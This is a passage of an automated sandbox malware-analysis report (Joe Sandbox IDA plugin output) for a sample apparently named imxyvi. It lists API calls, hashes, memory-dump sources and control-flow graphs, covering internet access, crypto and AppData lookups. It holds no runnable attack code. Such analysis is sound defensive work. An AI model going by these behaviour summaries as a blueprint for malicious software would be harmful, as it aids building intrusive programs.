                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskQuery_perf_counterQuery_perf_frequencyRandom_device@std@@Sleepmallocmemset
                                                                                                                                                                                                                                                                                      • String ID: d$random
                                                                                                                                                                                                                                                                                      • API String ID: 2134775511-2911377361
                                                                                                                                                                                                                                                                                      • Opcode ID: 378219d4221bcfb769ee7b7e12865bd48fbe29bb4055311c2f97bf1c6bf5f326
                                                                                                                                                                                                                                                                                      • Instruction ID: ae9acc3a2e4f792aa2f88ec7301bd560308f4fde632e53b1af2c51e109e790f2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 378219d4221bcfb769ee7b7e12865bd48fbe29bb4055311c2f97bf1c6bf5f326
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37822532B19A4146EB15CF78D4621BEA361BFD9794F208336EA4EE7A95DF3CE4418700

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953A982
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A953A998
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953B444: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6A953B44D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A953B444: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF6A953A99D,?,?,7FFFFFFFFFFFFFFF,00007FF6A95318F5), ref: 00007FF6A953B45E
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A953A99E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 594857686-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b02f8f9ff049981762919c30e42cf851c37efd62a439708261abe70c56ed295
                                                                                                                                                                                                                                                                                      • Instruction ID: 6b8a691cb972bb74c9602b61c3d874d62000104313299fcd9bad6f130db9fa62
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b02f8f9ff049981762919c30e42cf851c37efd62a439708261abe70c56ed295
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E0B641E0B10B15FD6E2E71146717AA3400F593B0E3D1B34D97DD92C3AD1CE4514111
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$BinaryCloseCryptHandleProcessStringmallocmemset$CodeCreateExitObjectQuery_perf_counterQuery_perf_frequencyRandom_device@std@@SingleWait_flushallfreegetenvmemcpy
                                                                                                                                                                                                                                                                                      • String ID: random
                                                                                                                                                                                                                                                                                      • API String ID: 2415399023-373021397
                                                                                                                                                                                                                                                                                      • Opcode ID: b929d7ccd83d82a7f1fc29ad6f78be35c9839b0f3f33cae63f517bdfdb0c32ab
                                                                                                                                                                                                                                                                                      • Instruction ID: 4b45a6e5e7c64c8e6ab38fd96b274d868319210f41c792762f6e7fe45dc7a4ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b929d7ccd83d82a7f1fc29ad6f78be35c9839b0f3f33cae63f517bdfdb0c32ab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC2E432E09B4186EB11DF74E4621BDA365BF96794F308336EA5EE7A95DF38E4418300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet_invalid_parameter_noinfo_noreturn$CloseHandlememcpy$Openmemset$Concurrency::cancel_current_taskFileQuery_perf_counterQuery_perf_frequencyRandom_device@std@@Read
                                                                                                                                                                                                                                                                                      • String ID: orn`$random
                                                                                                                                                                                                                                                                                      • API String ID: 2635940824-2186681027
                                                                                                                                                                                                                                                                                      • Opcode ID: 60faaa9d7f14a92eec1847cd06f328deaa6bd04c08503be3c4f515e4f435ec21
                                                                                                                                                                                                                                                                                      • Instruction ID: e3ee22cc61ce1d3e72945fa68debf67d22791dca2dfe213dd5d3837a35a0c5ba
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60faaa9d7f14a92eec1847cd06f328deaa6bd04c08503be3c4f515e4f435ec21
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2B20822F19A8146EB15DF34E4521BDE361BF96794F209336EA4EE7A95DF3CE4418300

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 4408 7ff6a953a518-7ff6a953a558 4409 7ff6a953a56d-7ff6a953a576 4408->4409 4410 7ff6a953a55a-7ff6a953a561 4408->4410 4412 7ff6a953a578-7ff6a953a57b 4409->4412 4413 7ff6a953a592-7ff6a953a594 4409->4413 4410->4409 4411 7ff6a953a563-7ff6a953a568 4410->4411 4414 7ff6a953a7f6-7ff6a953a81c call 7ff6a953a940 4411->4414 4412->4413 4415 7ff6a953a57d-7ff6a953a585 4412->4415 4416 7ff6a953a59a-7ff6a953a59e 4413->4416 4417 7ff6a953a7f4 4413->4417 4419 7ff6a953a587-7ff6a953a589 4415->4419 4420 7ff6a953a58b-7ff6a953a58e 4415->4420 4421 7ff6a953a675-7ff6a953a69c call 7ff6a953a840 4416->4421 4422 7ff6a953a5a4-7ff6a953a5a7 4416->4422 4417->4414 4419->4413 4419->4420 4420->4413 4433 7ff6a953a6be-7ff6a953a6c7 4421->4433 4434 7ff6a953a69e-7ff6a953a6a7 4421->4434 4425 7ff6a953a5a9-7ff6a953a5b1 4422->4425 4426 7ff6a953a5bb-7ff6a953a5cd GetFileAttributesExW 4422->4426 4425->4426 4430 7ff6a953a5b3-7ff6a953a5b5 4425->4430 4427 7ff6a953a620-7ff6a953a62f 4426->4427 4428 7ff6a953a5cf-7ff6a953a5d8 GetLastError 4426->4428 4432 7ff6a953a633-7ff6a953a635 4427->4432 4428->4414 4431 7ff6a953a5de-7ff6a953a5f0 FindFirstFileW 4428->4431 4430->4421 4430->4426 4435 7ff6a953a5fd-7ff6a953a61e FindClose 4431->4435 4436 7ff6a953a5f2-7ff6a953a5f8 GetLastError 4431->4436 4437 7ff6a953a637-7ff6a953a63f 4432->4437 4438 7ff6a953a641-7ff6a953a66f 4432->4438 4441 7ff6a953a6cd-7ff6a953a6e5 GetFileInformationByHandleEx 4433->4441 4442 7ff6a953a77f-7ff6a953a788 4433->4442 4439 7ff6a953a6a9-7ff6a953a6b1 CloseHandle 4434->4439 4440 7ff6a953a6b7-7ff6a953a6b9 4434->4440 4435->4432 4436->4414 4437->4421 4437->4438 4438->4417 4438->4421 4439->4440 4445 7ff6a953a830-7ff6a953a836 abort 4439->4445 4440->4414 4443 7ff6a953a6e7-7ff6a953a6f3 GetLastError 4441->4443 4444 7ff6a953a710-7ff6a953a729 4441->4444 4446 7ff6a953a7dd-7ff6a953a7df 4442->4446 4447 7ff6a953a78a-7ff6a953a79e GetFileInformationByHandleEx 4442->4447 4448 7ff6a953a709-7ff6a953a70b 4443->4448 4449 7ff6a953a6f5-7ff6a953a700 CloseHandle 4443->4449 4444->4442 4452 7ff6a953a72b-7ff6a953a72f 4444->4452 4453 7ff6a953a837-7ff6a953a83c 4445->4453 4450 7ff6a953a81d-7ff6a953a821 4446->4450 4451 7ff6a953a7e1-7ff6a953a7e5 4446->4451 4454 7ff6a953a7ca-7ff6a953a7da 4447->4454 4455 7ff6a953a7a0-7ff6a953a7ac GetLastError 4447->4455 4448->4414 4449->4448 4457 7ff6a953a702-7ff6a953a708 abort 4449->4457 4450->4453 4461 7ff6a953a823-7ff6a953a82e CloseHandle 4450->4461 4451->4417 4458 7ff6a953a7e7-7ff6a953a7f2 CloseHandle 4451->4458 4459 7ff6a953a778 4452->4459 4460 7ff6a953a731-7ff6a953a74b GetFileInformationByHandleEx 4452->4460 4453->4414 4454->4446 4455->4448 4456 7ff6a953a7b2-7ff6a953a7bd CloseHandle 4455->4456 4456->4448 4462 7ff6a953a7c3-7ff6a953a7c9 abort 4456->4462 4457->4448 4458->4417 4458->4445 4465 7ff6a953a77c 4459->4465 4463 7ff6a953a74d-7ff6a953a759 GetLastError 4460->4463 4464 7ff6a953a76f-7ff6a953a776 4460->4464 4461->4445 4461->4453 4462->4454 4463->4448 4466 7ff6a953a75b-7ff6a953a766 CloseHandle 4463->4466 4464->4465 4465->4442 4466->4448 4467 7ff6a953a768-7ff6a953a76e abort 4466->4467 4467->4464
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4293554670-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 44e7e6355c3c3b4b5313ce6daddb476d4210d714f126fdf26df65ff8189d85fc
                                                                                                                                                                                                                                                                                      • Instruction ID: d576819c3c770e6ec7b5f135b003363488f9aa978c8f7887467365fd5ed4d292
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44e7e6355c3c3b4b5313ce6daddb476d4210d714f126fdf26df65ff8189d85fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09916431B0AA4246E6648F36A86667BB3A0AF457B4F244734D97EC7BD4DF3CE4458700
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: d$random
                                                                                                                                                                                                                                                                                      • API String ID: 0-2911377361
                                                                                                                                                                                                                                                                                      • Opcode ID: 6a1d63252b99d767dc8b2b6da839cd8a9492322314fe0ac6daa97eefb539ed6f
                                                                                                                                                                                                                                                                                      • Instruction ID: dabbac570b84b908cf216767612406cb11fe14a55f025007d30b97378a7bd6ce
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a1d63252b99d767dc8b2b6da839cd8a9492322314fe0ac6daa97eefb539ed6f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8322BC22F1AAC145E7619F3490523BEE351FF96790F609336D68AE7A96DF3CE4418700
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: d$random
                                                                                                                                                                                                                                                                                      • API String ID: 0-2911377361
                                                                                                                                                                                                                                                                                      • Opcode ID: 7755d2b89ba28df3633deb0c79588d370e49f994472a7b3122896593b2b0def4
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d75e82db3e5befe33ab4282663e1695149601e32857b64b95a737f99b96f4d9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7755d2b89ba28df3633deb0c79588d370e49f994472a7b3122896593b2b0def4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2722C822A1ABC146D621DF3490523BAE351FF96790F609336E69EE7A86DF3CE4418740

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 19b8450d50022a509fbeeb78ade14be2cd2f4d19ae30be10dbf0b2131a84a497
                                                                                                                                                                                                                                                                                      • Instruction ID: f94ca54d165358e835c1f9a6cbc5450f7e08d0e3d8024ddd02f8120805bd778c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b8450d50022a509fbeeb78ade14be2cd2f4d19ae30be10dbf0b2131a84a497
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67312F72605B8186EB608F61E8513FEB3A5FB84744F54443ADA4EC7B94EF38D548C710

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 7195 7ff6a95143e0-7ff6a9514443 SHGetFolderPathA 7196 7ff6a9514449-7ff6a951445f 7195->7196 7197 7ff6a95145e5-7ff6a9514600 call 7ff6a95311f0 7195->7197 7199 7ff6a9514466-7ff6a951446d 7196->7199 7200 7ff6a9514605-7ff6a9514633 call 7ff6a953a940 7197->7200 7199->7199 7201 7ff6a951446f-7ff6a95144a9 call 7ff6a95311f0 7199->7201 7206 7ff6a95144b0-7ff6a95144b7 7201->7206 7206->7206 7207 7ff6a95144b9-7ff6a95144d2 7206->7207 7208 7ff6a9514558 7207->7208 7209 7ff6a95144d8-7ff6a95144db 7207->7209 7211 7ff6a951455f-7ff6a951459b call 7ff6a95311f0 7208->7211 7209->7208 7210 7ff6a95144e1-7ff6a9514507 memset 7209->7210 7212 7ff6a9514509 7210->7212 7213 7ff6a9514520-7ff6a951453e 7210->7213 7220 7ff6a951459d-7ff6a95145af 7211->7220 7221 7ff6a95145d2-7ff6a95145e3 7211->7221 7215 7ff6a9514510-7ff6a951451e 7212->7215 7216 7ff6a9514540-7ff6a9514543 7213->7216 7217 7ff6a9514553-7ff6a9514556 7213->7217 7215->7213 7215->7215 7216->7208 7219 7ff6a9514545-7ff6a9514551 7216->7219 7217->7211 7219->7216 7219->7217 7222 7ff6a95145cd call 7ff6a953a960 7220->7222 7223 7ff6a95145b1-7ff6a95145c4 7220->7223 7221->7200 7222->7221 7223->7222 7224 7ff6a95145c6-7ff6a95145cc _invalid_parameter_noinfo_noreturn 7223->7224 7224->7222
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FolderPath_invalid_parameter_noinfo_noreturnmemset
                                                                                                                                                                                                                                                                                      • String ID: Failed to get AppData path.$L$\
                                                                                                                                                                                                                                                                                      • API String ID: 1486729589-1473829883
                                                                                                                                                                                                                                                                                      • Opcode ID: 48d7c37734061eddc4afed10d7cae08c14a93a7514c1b379dfaca0f549b88086
                                                                                                                                                                                                                                                                                      • Instruction ID: 773444b936fc9bb866f05aabe4bfecf84ef53dce15aaad1100d9927a288ad777
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48d7c37734061eddc4afed10d7cae08c14a93a7514c1b379dfaca0f549b88086
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3351E822A19BC185E7508F39E4413BA77A1FB457A4F616331EBAD82AD5DF3CD194C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                                                      • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                                                      • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                                                      • Opcode ID: 80a4920f6669cba734518a6d54b8e5416cb3d2bb96b06634253721d9f0ddd4a7
                                                                                                                                                                                                                                                                                      • Instruction ID: 1fd09823765ffd5941700c56cd326041b1c3c6ed1089cf36aa838c82f8288f01
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80a4920f6669cba734518a6d54b8e5416cb3d2bb96b06634253721d9f0ddd4a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2016D72A0978282F7118F22B4657ABB7A1FB95784F248135DA4AC6A98CF3CD5058700

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6A952F1DD
                                                                                                                                                                                                                                                                                      • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6A952F1FC
                                                                                                                                                                                                                                                                                      • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6A952F22E
                                                                                                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6A952F249
                                                                                                                                                                                                                                                                                      • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF6A952F273
                                                                                                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6A952F290
                                                                                                                                                                                                                                                                                      • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6A952F2B7
                                                                                                                                                                                                                                                                                      • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6A952F302
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530940: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6A953096D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530940: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6A9530987
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530940: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6A95309B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530940: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6A95309E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530940: std::_Facet_Register.LIBCPMT ref: 00007FF6A95309FD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF6A9530940: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6A9530A1C
                                                                                                                                                                                                                                                                                      • ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD@Z.MSVCP140 ref: 00007FF6A952F317
                                                                                                                                                                                                                                                                                      • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6A952F32E
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6A952F370
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000001C.00000002.1562795909.00007FF6A9511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6A9510000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562768209.00007FF6A9510000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562864358.00007FF6A9548000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000001C.00000002.1562894010.00007FF6A954C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_28_2_7ff6a9510000_imxyvi.jbxd
                                                                                                                                                                                                                                                                                      Similarity
